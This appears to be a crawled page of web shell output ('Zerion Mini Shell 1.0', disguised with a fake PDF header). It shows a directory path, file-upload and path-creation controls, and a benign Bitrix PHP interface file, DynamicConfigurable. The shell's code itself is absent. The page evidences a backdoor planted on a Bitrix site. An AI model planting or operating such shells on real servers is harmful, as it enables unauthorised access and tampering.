%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/bitrix/www/bitrix/modules/main/lib/numerator/generator/contract/
Upload File :
Create Path :
Current File : /home/bitrix/www/bitrix/modules/main/lib/numerator/generator/contract/dynamicconfigurable.php

<?php
namespace Bitrix\Main\Numerator\Generator\Contract;
/**
 * Interface DynamicConfigurable -
 * for generators that can not use static values or user specified settings for template parse
 * generators receive values for parsing from outside on every run
 * from where they can get values for replace template words
 * @package Bitrix\Main\Numerator\Contract
 */
interface DynamicConfigurable
{
	/**
	 * @param array $config
	 */
	public function setDynamicConfig($config);
}

Zerion Mini Shell 1.0